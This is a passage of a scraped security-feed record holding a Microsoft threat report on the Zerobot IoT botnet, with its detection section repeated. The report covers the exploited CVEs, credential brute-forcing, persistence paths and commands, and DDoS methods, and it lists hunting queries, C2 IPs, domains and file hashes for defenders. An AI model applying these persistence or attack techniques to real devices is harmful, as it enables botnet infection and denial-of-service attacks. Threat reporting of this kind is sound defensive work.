CVE-2017-17215\n * CVE-2018-10561\n * CVE-2018-20057\n * CVE-2019-10655\n * CVE-2020-7209\n * CVE-2020-10987\n * CVE-2020-25506\n * CVE-2021-35395\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2021-46422\n * CVE-2022-22965\n * CVE-2022-25075\n * CVE-2022-26186\n * CVE-2022-26210\n * CVE-2022-30023\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-33891\n * CVE-2022-34538\n * CVE-2022-37061\n * ZERO-36290\n * ZSL-2022-5717\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects the malicious files under the following platforms and threat names:\n\n * Zerobot (Win32/64 and Linux)\n * SparkRat (Win32/64 and Linux)\n\n**Microsoft Defender for Endpoint**\n\nMicrosoft Defender for Endpoint alerts with the following titles can indicate threat activity on your network:\n\n * DEV-1061 threat activity group detected\n * An active 'PrivateLoader' malware process was detected while executing\n * 'Morila' malware was prevented\n * 'Multiverze' malware was detected\n\nMicrosoft Defender for Endpoint also has detections for the following vulnerabilities exploited by Zerobot:\n\n * CVE-2022-22965 (Spring4Shell)\n\nMicrosoft Defender for Endpoint's Device Discovery capabilities discover and classify devices. With these capabilities, Microsoft 365 Defender customers using Microsoft Defender for IoT have visibility into security recommendations for devices with the following vulnerabilities:\n\n * CVE-2014-8361\n * CVE-2019-10655\n * CVE-2020-25506\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-37061\n\nDevices with these vulnerabilities are also visible in the Microsoft Defender Vulnerability Management inventory.\n\n**Microsoft Defender for Cloud**\n\nMicrosoft Defender for Cloud alerts with the following titles can indicate threat activity on your network:\n\n * VM_ReverseShell\n * VM_SuspectDownloadArtifacts\n * SQL.VM_ShellExternalSourceAnomaly\n * AppServices_CurlToDisk\n\n## Advanced hunting queries\n\n### **Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks.\n\n**Zerobot files**\n\nThis query finds the file hashes associated with Zerobot activity.\n \n \n let IoCList = externaldata(TimeGenerated:datetime,IoC:string,IoC_Type:string,ExpirationDateTime:datetime,Description:string, Action:string, ConfidenceScore:real, ThreatType:string, Active:string,Type:string, TrafficLightProtocolLevel:string, \n ActivityGroupNames:string)[@\"https://raw.githubusercontent.com/microsoft/mstic/master/RapidReleaseTI/Indicators.csv\"] \n with(format=\"csv\", ignoreFirstRecord=True);\n let shahashes = IoCList\n | where IoC_Type =~ \"sha256\" and Description =~ \"Dev-1061 Zerobot affecting IoT devices\"\n | distinct IoC;\n DeviceFileEvents\n | where SHA256 in (shahashes)\n\n**Zerobot HTTP requests**\n\nThis query finds suspicious HTTP requests originated by the IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"NetworkSignatureInspected\"\n | where Timestamp > ago(30d)\n |extend json = parse_json(AdditionalFields)\n | extend SignatureName =tostring(json.SignatureName), SignatureMatchedContent = tostring(json.SignatureMatchedContent), SignatureSampleContent = tostring(json.SamplePacketContent)\n |where SignatureName == \"HTTP_Client\"\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, SignatureName, SignatureMatchedContent, SignatureSampleContent\n \n\n**Zerobot port knocking**\n\nThis query finds incoming connections from IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"InboundConnectionAccepted\"\n | where Timestamp > ago(30d)\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, InitiatingProcessFileName\n \n\n### **Microsoft Sentinel**\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>\n\n## Indicators of compromise (IOCs):\n\n**Domains and IP addresses:**\n\n * zero[.]sudolite[.]ml\n * 176.65.137[.]5\n * 176.65.137[.]5:1401\n * 176.65.137[.]6\n * ws[:]//176.65.137[.]5/handle\n * http[:]//176.65.137[.]5:8000/ws\n\n**New Zerobot hashes (SHA-256)**\n\n * aed95a8f5822e9b1cd1239abbad29d3c202567afafcf00f85a65df4a365bedbb\n * bf582b5d470106521a8e7167a5732f7e3a4330d604de969eb8461cbbbbdd9b9a\n * 0a5eebf19ccfe92a2216c492d6929f9cac72ef37089390572d4e21d0932972c8\n * 1e7ca210ff7bedeefadb15a9ec5ea68ad9022d0c6f41c4e548ec2e5927026ba4\n * 05b7517cb05fe1124dd0fad4e85ddf0fe65766a4c6c9986806ae98a427544e9d\n * 5625d41f239e2827eb05bfafde267109549894f0523452f7a306b53b90e847f2\n * c304a9156a032fd451bff49d75b0e9334895604549ab6efaab046c5c6461c8b3\n * 66c76cfc64b7a5a06b6a26976c88e24e0518be3554b5ae9e3475c763b8121792\n * 539640a482aaee2fe743502dc59043f11aa8728ce0586c800193e30806b2d0e5\n * 0f0ba8cc3e46fff0eef68ab5f8d3010241e2eea7ee795e161f05d32a0bf13553\n * 343c9ca3787bf763a70ed892dfa139ba69141b61c561c128084b22c16829c5af\n * 874b0691378091a30d1b06f2e9756fc7326d289b03406023640c978ff7c87712\n * 29eface0054da4cd91c72a0b2d3cda61a02831b4c273e946d7e106254a6225a7\n * 4a4cb8516629c781d5557177d48172f4a7443ca1f826ea2e1aa6132e738e6db2\n * bdfd89bdf6bc2de5655c3fe5f6f4435ec4ad37262e3cc72d8cb5204e1273ccd6\n * 62f23fea8052085d153ac7b26dcf0a15fad0c27621f543cf910e37f8bf822e0e\n * 788e15fd87c45d38629e3e715b0cb93e55944f7c4d59da2e480ffadb6b981571\n * 26e68684f5b76d9016d4f02b8255ff52d1b344416ffc19a2f5c793ff1c2fdc65\n * e4840c5ac2c2c2170d00feadb5489c91c2943b2aa13bbec00dbcffc4ba8dcc2d\n * 45059f26e32da95f4bb5dababae969e7fceb462cdeadf7d141c39514636b905a\n * 77dd28a11e3e4260b9a9b60d58cb6aaaf2147da28015508afbaeda84c1acfe70\n * cf232e7d39094c9ba04b9713f48b443e9d136179add674d62f16371bf40cf8c8\n * 13657b64a2ac62f9d68aeb75737cca8f2ab9f21e4c38ce04542b177cb3a85521\n * eb33c98add35f6717a3afb0ab2f9c0ee30c6f4e0576046be9bf4fbf9c5369f71\n * e3dd20829a34caab7f1285b730e2bb0c84c90ac1027bd8e9090da2561a61ab17\n * 3685d000f6a884ca06f66a3e47340e18ff36c16b1badb80143f99f10b8a33768\n * cdc28e7682f9951cbe2e55dad8bc2015c1591f89310d8548c0b7a1c65dbefae3\n * 869f4fb3f185b2d1231d9378273271ddfeebb53085daede89989f9cc8d364f5f\n * 6c59af3ed1a616c238ee727f6ed59e962db70bc5a418b20b24909867eb00a9d6\n * ef28ee3301e97eefd2568a3cb4b0f737c5f31983710c75b70d960757f2def74e\n * 95e4cc13f8388c195a1220cd44d26fcb2e10b7b8bfc3d69efbc51beb46176ff1\n * 62f9eae8a87f64424df90c87dd34401fe7724c87a394d1ba842576835ab48afc\n * 54d1daf58ecd4d8314b791a79eda2258a69d7c69a5642b7f5e15f2210958bdce\n * 8176991f355db10b32b7562d1d4f7758a23c7e49ed83984b86930b94ccc46ab3\n * 8aa89a428391683163f0074a8477d554d6c54cab1725909c52c41db2942ac60f\n * fd65bd8ce671a352177742616b5facc77194cccec7555a2f90ff61bad4a7a0f6\n * 1e66ee40129deccdb6838c2f662ce33147ad36b1e942ea748504be14bb1ee0ef\n * 57f83ca864a2010d8d5376c68dc103405330971ade26ac920d6c6a12ea728d3d\n * 7bfd0054aeb8332de290c01f38b4b3c6f0826cf63eef99ddcd1a593f789929d6\n\n****SparkRat** hashes (SHA-256): **\n\n * 0ce7bc2b72286f236c570b1eb1c1eacf01c383c23ad76fd8ca51b8bc123be340\n * cacb77006b0188d042ce95e0b4d46f88828694f3bf4396e61ae7c24c2381c9bf\n * 65232e30bb8459961a6ab2e9af499795941c3d06fdd451bdb83206a00b1b2b88\n\n_**Rotem Sde-Or**, **Ilana Sivan**, **Gil Regev**, Microsoft Defender for IoT Research Team \n**Meitar Pinto**, **Nimrod Roimy**, **Nir Avnery**, Microsoft Defender Research Team \n**Ramin Nafisi**, **Ross Bevington**, Microsoft Threat Intelligence Center (MSTIC)_\n\nThe post [Microsoft research uncovers new Zerobot capabilities](<https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-21T20:00:00", "type": "mssecure", "title": "Microsoft research uncovers new Zerobot capabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361", "CVE-2016-20017", "CVE-2017-17105", "CVE-2017-17106", "CVE-2017-17215", "CVE-2018-10561", "CVE-2018-12613", "CVE-2018-20057", "CVE-2019-10655", "CVE-2020-10987", "CVE-2020-25223", "CVE-2020-25506", "CVE-2020-7209", "CVE-2021-35395", "CVE-2021-36260", "CVE-2021-42013", "CVE-2021-46422", "CVE-2022-22965", "CVE-2022-25075", "CVE-2022-26186", "CVE-2022-26210", "CVE-2022-30023", "CVE-2022-30525", "CVE-2022-31137", "CVE-2022-33891", "CVE-2022-34538", "CVE-2022-37061", "CVE-2022-42013"], "modified": "2022-12-21T20:00:00", "id": "MSSECURE:0FBB61490D4A94C83AEE14DDEE722297", "href": "https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2022-12-21T20:35:18", "description": "Botnet malware operations are a constantly evolving threat to devices and networks. Threat actors target Internet of Things (IoT) devices for recruitment into malicious operations as IoT devices\u2019 configurations often leave them exposed, and the number of internet-connected devices continue to grow. Recent trends have shown that operators are redeploying malware for a variety of distributions and objectives, modifying existing botnets to scale operations and add as many devices as possible to their infrastructure.\n\nZerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware. The Microsoft Defender for IoT research team has been monitoring Zerobot (also called ZeroStresser by its operators) for months. Zerobot is offered as part of a malware as a service scheme and has been updated several times since Microsoft started to track it. One domain with links to Zerobot was among several domains associated with DDoS-for-hire services [seized by the FBI](<https://www.justice.gov/usao-cdca/pr/federal-prosecutors-los-angeles-and-alaska-charge-6-defendants-operating-websites>) in December 2022.\n\nMicrosoft has previously reported on the [evolving threat ecosystem](<https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>). The shift toward malware as a service in the cyber economy has industrialized attacks and has made it easier for attackers to purchase and use malware, establish and maintain access to compromised networks, and utilize ready-made tools to perform their attacks. We have tracked advertisements for the Zerobot botnet on various social media networks in addition to other announcements regarding the sale and maintenance of the malware, as well as new capabilities in development.\n\nIn this blog post, we present information about the latest version of the malware, Zerobot 1.1, including newly identified capabilities and further context to Fortinet\u2019s recent [analysis](<https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities>) on the threat. Zerobot 1.1 increases its capabilities with the inclusion of new attack methods and new exploits for supported architectures, expanding the malware\u2019s reach to different types of devices. In addition to these findings, we\u2019re sharing new indicators of compromise (IOCs) and recommendations to help defenders protect devices and networks against this threat.\n\n## What is Zerobot?\n\nZerobot affects a variety of devices that include firewall devices, routers, and cameras, adding compromised devices to a distributed denial of service (DDoS) botnet. Using several modules, the malware can infect vulnerable devices built on diverse architectures and operating systems, find additional devices to infect, achieve persistence, and attack a range of protocols. Microsoft tracks this activity as DEV-1061.\n\nThe most recent distribution of Zerobot includes additional capabilities, such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891 respectively), and new DDoS attack capabilities.\n\nMicrosoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing Microsoft to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## How Zerobot gains and maintains device access\n\nIoT devices are often internet-exposed, leaving unpatched and improperly secured devices vulnerable to exploitation by threat actors. Zerobot is capable of propagating through brute force attacks on vulnerable devices with insecure configurations that use default or weak credentials. The malware may attempt to gain device access by using a combination of eight common usernames and 130 passwords for IoT devices over SSH and telnet on ports 23 and 2323 to spread to devices. Microsoft researchers identified numerous SSH and telnet connection attempts on default ports 22 and 23, as well as attempts to open ports and connect to them by port-knocking on ports 80, 8080, 8888, and 2323.\n\nIn addition to brute force attempts on devices, Zerobot exploits dozens of vulnerabilities, which malware operators add on a rolling basis to gain access and inject malicious payloads. Zerobot 1.1 includes several new vulnerabilities, such as:\n\n**Vulnerability**| **Affected software** \n---|--- \nCVE-2017-17105| Zivif PR115-204-P-RS \nCVE-2019-10655| Grandstream \nCVE-2020-25223| WebAdmin of Sophos SG UTM \nCVE-2021-42013| Apache \nCVE-2022-31137| Roxy-WI \nCVE-2022-33891| Apache Spark \nZSL-2022-5717| MiniDVBLinux \n \nSince the release of Zerobot 1.1, the malware operators have removed CVE-2018-12613, a phpMyAdmin vulnerability that could allow threat actors to view or execute files. Microsoft researchers have also identified that previous reports have used the vulnerability ID \u201cZERO-32906\u201d for CVE-2018-20057, \u201cGPON\u201d for CVE-2018-10561, and \u201cDLINK\u201d for CVE-2016-20017; and that CVE-2020-7209 was mislabeled as CVE-2017-17106 and CVE-2022-42013 was mislabeled as CVE-2021-42013.\n\nMicrosoft researchers have also found new evidence that Zerobot propagates by compromising devices with known vulnerabilities that are not included in the malware binary, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers.\n\nUpon gaining device access, Zerobot injects a malicious payload, which may be a generic script called _zero.sh _that downloads and attempts to execute Zerobot, or a script that downloads the Zerobot binary of a specific architecture. The bash script that attempts to download different Zerobot binaries tries to identify the architecture by brute-force, attempting to download and execute binaries of various architectures until it succeeds, as IoT devices are based on many computer processing units (CPUs). Microsoft has observed scripts targeting various architectures including ARM64, MIPS, and x86_64.\n\nDepending on the operating system of the device, the malware has different persistence mechanisms. Persistence tactics are used by malware operators to obtain and maintain access to devices. While Zerobot is unable to spread to Windows machines, we have found several samples that can run on Windows. On Windows machines, the malware copies itself to the Startup folder with the file name _FireWall.exe_ (older versions use _my.exe)_. Microsoft Defender for Endpoint detects this malware and related malicious activity on both Windows and Linux devices. See detection details below.\n\nTo achieve persistence on Linux-based devices, Zerobot uses a combination of desktop entry, daemon, and service methods:\n\n**Desktop entry:**\n\nZerobot copies itself to _$HOME/.config/ssh.service/sshf_ then writes a desktop entry file called _sshf.desktop_ to the same directory. Older Linux versions use _$HOME/.config/autostart_ instead of _$HOME/.config/ssh.service_.\n\n**Daemon:**\n\nCopies itself to _/usr/bin/sshf_ and writes a configuration at _/etc/init/sshf.conf_.\n\n**Service:**\n\nCopies itself to _/etc/sshf_ and writes a service configuration at _/lib/system/system/sshf.service_, then enables the service (to make sure it starts at boot) with two commands:\n\n * _systemctl enable sshf_\n * _service enable sshf_\n\nAll persistence mechanisms on older Linux versions use _my.bin_ and _my.bin.desktop_ instead of _sshf_ and _sshf.desktop._\n\n## New attack capabilities\n\nIn addition to the functions and attacks included in previous versions of the malware, Zerobot 1.1 has additional DDoS attack capabilities. These functions allow threat actors to target resources and make them inaccessible. Successful DDoS attacks may be used by threat actors to extort ransom payments, distract from other malicious activities, or disrupt operations. In almost every attack, the destination port is customizable, and threat actors who purchase the malware can modify the attack according to their target.\n\nThe following are the previously known Zerobot capabilities:\n\n**Attack method**| **Description** \n---|--- \nUDP_LEGIT| Sends UDP packets without data. \nMC_PING| Meant for DDoS on Minecraft servers. Sends a handshake and status request. \nTCP_HANDSHAKE| Floods with TCP handshakes. \nTCP_SOCKET| Continuously sends random payloads on an open TCP socket. Payload length is customizable. \nTLS_SOCKET| Continuously sends random payloads on an open TLS socket. Payload length is customizable. \nHTTP_HANDLE| Sends HTTP GET requests using a Golang standard library. \nHTTP_RAW| Formats and sends HTTP GET requests. \nHTTP_BYPASS| Sends HTTP GET requests with spoofed headers. \nHTTP_NULL| HTTP headers are each one random byte (not necessarily ascii). \n \nPreviously undisclosed and new capabilities are the following:\n\n**Attack method**| **Description** \n---|--- \nUDP_RAW| Sends UDP packets where the payload is customizable. \nICMP_FLOOD| Supposed to be an ICMP flood, but the packet is built incorrectly. \nTCP_CUSTOM| Sends TCP packets where the payload and flags are fully customizable. \nTCP_SYN| Sends SYN packets. \nTCP_ACK| Sends ACK packets. \nTCP_SYNACK| Sends SYN-ACK packets. \nTCP_XMAS| Christmas tree attack (all TCP flags are set). The reset cause field is \u201cxmas\u201d. \n \n## How Zerobot spreads\n\nAfter persistence is achieved, Zerobot scans for other internet-exposed devices to infect. The malware randomly generates a number between 0 and 255 and scans all IPs starting with this value. Using a function called _new_botnet_selfRepo_isHoneypot_, the malware tries to identify honeypot IP addresses, which are used by network decoys to attract cyberattacks and collect information on threats and attempts to access resources. This function includes 61 IP subnets, preventing scanning of these IPs.\n\nMicrosoft researchers also identified a sample that can run on Windows based on a cross-platform (Linux, Windows, macOS) open-source remote administration tool (RAT) with various features such as managing processes, file operations, screenshotting, and running commands. This tool was found by investigating the command-and-control (C2) IPs used by the malware. The script, which is used to download this RAT, is called _impst.sh_:\n\nFigure 1. The _impst.sh_ script used to download the remote administration tool\n\n## Defending devices and networks against Zerobot\n\nThe continuous evolution and rapid addition of new capabilities in the latest Zerobot version underscores the urgency of implementing comprehensive security measures. Microsoft recommends the following steps to protect devices and networks against the threat of Zerobot:\n\n * Use security solutions with cross-domain visibility and detection capabilities like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), which provides integrated defense across endpoints, identities, email, applications, and data. Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect Zerobot malware variants and malicious behavior related to this threat.\n * Adopt a comprehensive IoT security solution such as [Microsoft Defender for IoT](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-iot>) to allow visibility and monitoring of all IoT and OT devices, threat detection and response, and integration with SIEM/SOAR and XDR platforms such as Microsoft Sentinel and Microsoft 365 Defender.\n * Ensure secure configurations for devices: Change the default password to a strong one, and block SSH from external access.\n * Maintain device health with updates: Make sure devices are up to date with the latest firmware and patches.\n * Use least privileges access: Use a secure virtual private network (VPN) service for remote access and restrict remote access to the device.\n * Harden endpoints with a comprehensive Windows security solution:\n * Manage the apps your employees can use through Windows Defender Application Control and for unmanaged solutions, enabling Smart App Control.\n * Perform timely cleanup of all unused and stale executables sitting on yours or your organizations\u2019 devices.\n\n## Detections\n\n**Microsoft Defender for IoT**\n\nMicrosoft Defender for IoT uses detection rules and signatures to identify malicious behavior. Microsoft Defender for IoT has alerts for the following vulnerabilities and exploits which may be tied to Zerobot activity:\n\n * CVE-2014-8361\n * CVE-2016-20017\n * CVE-2017-17105\n * CVE-2017-17215\n * CVE-2018-10561\n * CVE-2018-20057\n * CVE-2019-10655\n * CVE-2020-7209\n * CVE-2020-10987\n * CVE-2020-25506\n * CVE-2021-35395\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2021-46422\n * CVE-2022-22965\n * CVE-2022-25075\n * CVE-2022-26186\n * CVE-2022-26210\n * CVE-2022-30023\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-33891\n * CVE-2022-34538\n * CVE-2022-37061\n * ZERO-36290\n * ZSL-2022-5717\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects the malicious files under the following platforms and threat names:\n\n * Zerobot (Win32/64 and Linux)\n * SparkRat (Win32/64 and Linux)\n\n**Microsoft Defender for Endpoint**\n\nMicrosoft Defender for Endpoint alerts with the following titles can indicate threat activity on your network:\n\n * DEV-1061 threat activity group detected\n * An active 'PrivateLoader' malware process was detected while executing\n * 'Morila' malware was prevented\n * 'Multiverze' malware was detected\n\nMicrosoft Defender for Endpoint also has detections for the following vulnerabilities exploited by Zerobot:\n\n * CVE-2022-22965 (Spring4Shell)\n\nMicrosoft Defender for Endpoint's Device Discovery capabilities discover and classify devices. With these capabilities, Microsoft 365 Defender customers using Microsoft Defender for IoT have visibility into security recommendations for devices with the following vulnerabilities:\n\n * CVE-2014-8361\n * CVE-2019-10655\n * CVE-2020-25506\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-37061\n\nDevices with these vulnerabilities are also visible in the Microsoft Defender Vulnerability Management inventory.\n\n**Microsoft Defender for Cloud**\n\nMicrosoft Defender for Cloud alerts with the following titles can indicate threat activity on your network:\n\n * VM_ReverseShell\n * VM_SuspectDownloadArtifacts\n * SQL.VM_ShellExternalSourceAnomaly\n * AppServices_CurlToDisk\n\n## Advanced hunting queries\n\n### **Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks.\n\n**Zerobot files**\n\nThis query finds the file hashes associated with Zerobot activity.\n \n \n let IoCList = externaldata(TimeGenerated:datetime,IoC:string,IoC_Type:string,ExpirationDateTime:datetime,Description:string, Action:string, ConfidenceScore:real, ThreatType:string, Active:string,Type:string, TrafficLightProtocolLevel:string, \n ActivityGroupNames:string)[@\"https://raw.githubusercontent.com/microsoft/mstic/master/RapidReleaseTI/Indicators.csv\"] \n with(format=\"csv\", ignoreFirstRecord=True);\n let shahashes = IoCList\n | where IoC_Type =~ \"sha256\" and Description =~ \"Dev-1061 Zerobot affecting IoT devices\"\n | distinct IoC;\n DeviceFileEvents\n | where SHA256 in (shahashes)\n\n**Zerobot HTTP requests**\n\nThis query finds suspicious HTTP requests originated by the IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"NetworkSignatureInspected\"\n | where Timestamp > ago(30d)\n |extend json = parse_json(AdditionalFields)\n | extend SignatureName =tostring(json.SignatureName), SignatureMatchedContent = tostring(json.SignatureMatchedContent), SignatureSampleContent = tostring(json.SamplePacketContent)\n |where SignatureName == \"HTTP_Client\"\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, SignatureName, SignatureMatchedContent, SignatureSampleContent\n \n\n**Zerobot port knocking**\n\nThis query finds incoming connections from IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"InboundConnectionAccepted\"\n | where Timestamp > ago(30d)\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, InitiatingProcessFileName\n \n\n### **Microsoft Sentinel**\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>\n\n## Indicators of compromise (IOCs):\n\n**Domains and IP addresses:**\n\n * zero[.]sudolite[.]ml\n * 176.65.137[.]5\n * 176.65.137[.]5:1401\n * 176.65.137[.]6\n * ws[:]//176.65.137[.]5/handle\n * http[:]//176.65.137[.]5:8000/ws\n\n**New Zerobot hashes (SHA-256)**\n\n * aed95a8f5822e9b1cd1239abbad29d3c202567afafcf00f85a65df4a365bedbb\n * bf582b5d470106521a8e7167a5732f7e3a4330d604de969eb8461cbbbbdd9b9a\n * 0a5eebf19ccfe92a2216c492d6929f9cac72ef37089390572d4e21d0932972c8\n * 1e7ca210ff7bedeefadb15a9ec5ea68ad9022d0c6f41c4e548ec2e5927026ba4\n * 05b7517cb05fe1124dd0fad4e85ddf0fe65766a4c6c9986806ae98a427544e9d\n * 5625d41f239e2827eb05bfafde267109549894f0523452f7a306b53b90e847f2\n * c304a9156a032fd451bff49d75b0e9334895604549ab6efaab046c5c6461c8b3\n * 66c76cfc64b7a5a06b6a26976c88e24e0518be3554b5ae9e3475c763b8121792\n * 539640a482aaee2fe743502dc59043f11aa8728ce0586c800193e30806b2d0e5\n * 0f0ba8cc3e46fff0eef68ab5f8d3010241e2eea7ee795e161f05d32a0bf13553\n * 343c9ca3787bf763a70ed892dfa139ba69141b61c561c128084b22c16829c5af\n * 874b0691378091a30d1b06f2e9756fc7326d289b03406023640c978ff7c87712\n * 29eface0054da4cd91c72a0b2d3cda61a02831b4c273e946d7e106254a6225a7\n * 4a4cb8516629c781d5557177d48172f4a7443ca1f826ea2e1aa6132e738e6db2\n * bdfd89bdf6bc2de5655c3fe5f6f4435ec4ad37262e3cc72d8cb5204e1273ccd6\n * 62f23fea8052085d153ac7b26dcf0a15fad0c27621f543cf910e37f8bf822e0e\n * 788e15fd87c45d38629e3e715b0cb93e55944f7c4d59da2e480ffadb6b981571\n * 26e68684f5b76d9016d4f02b8255ff52d1b344416ffc19a2f5c793ff1c2fdc65\n * e4840c5ac2c2c2170d00feadb5489c91c2943b2aa13bbec00dbcffc4ba8dcc2d\n * 45059f26e32da95f4bb5dababae969e7fceb462cdeadf7d141c39514636b905a\n * 77dd28a11e3e4260b9a9b60d58cb6aaaf2147da28015508afbaeda84c1acfe70\n * cf232e7d39094c9ba04b9713f48b443e9d136179add674d62f16371bf40cf8c8\n * 13657b64a2ac62f9d68aeb75737cca8f2ab9f21e4c38ce04542b177cb3a85521\n * eb33c98add35f6717a3afb0ab2f9c0ee30c6f4e0576046be9bf4fbf9c5369f71\n * e3dd20829a34caab7f1285b730e2bb0c84c90ac1027bd8e9090da2561a61ab17\n * 3685d000f6a884ca06f66a3e47340e18ff36c16b1badb80143f99f10b8a33768\n * cdc28e7682f9951cbe2e55dad8bc2015c1591f89310d8548c0b7a1c65dbefae3\n * 869f4fb3f185b2d1231d9378273271ddfeebb53085daede89989f9cc8d364f5f\n * 6c59af3ed1a616c238ee727f6ed59e962db70bc5a418b20b24909867eb00a9d6\n * ef28ee3301e97eefd2568a3cb4b0f737c5f31983710c75b70d960757f2def74e\n * 95e4cc13f8388c195a1220cd44d26fcb2e10b7b8bfc3d69efbc51beb46176ff1\n * 62f9eae8a87f64424df90c87dd34401fe7724c87a394d1ba842576835ab48afc\n * 54d1daf58ecd4d8314b791a79eda2258a69d7c69a5642b7f5e15f2210958bdce\n * 8176991f355db10b32b7562d1d4f7758a23c7e49ed83984b86930b94ccc46ab3\n * 8aa89a428391683163f0074a8477d554d6c54cab1725909c52c41db2942ac60f\n * fd65bd8ce671a352177742616b5facc77194cccec7555a2f90ff61bad4a7a0f6\n * 1e66ee40129deccdb6838c2f662ce33147ad36b1e942ea748504be14bb1ee0ef\n * 57f83ca864a2010d8d5376c68dc103405330971ade26ac920d6c6a12ea728d3d\n * 7bfd0054aeb8332de290c01f38b4b3c6f0826cf63eef99ddcd1a593f789929d6\n\n****SparkRat** hashes (SHA-256): **\n\n * 0ce7bc2b72286f236c570b1eb1c1eacf01c383c23ad76fd8ca51b8bc123be340\n * cacb77006b0188d042ce95e0b4d46f88828694f3bf4396e61ae7c24c2381c9bf\n * 65232e30bb8459961a6ab2e9af499795941c3d06fdd451bdb83206a00b1b2b88\n\n_**Rotem Sde-Or**, **Ilana Sivan**, **Gil Regev**, Microsoft Defender for IoT Research Team \n**Meitar Pinto**, **Nimrod Roimy**, **Nir Avnery**, Microsoft Defender Research Team \n**Ramin Nafisi**, **Ross Bevington**, Microsoft Threat Intelligence Center (MSTIC)_\n\nThe post [Microsoft research uncovers new Zerobot capabilities](<https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-21T20:00:00", "type": "mmpc", "title": "Microsoft research uncovers new Zerobot capabilities", 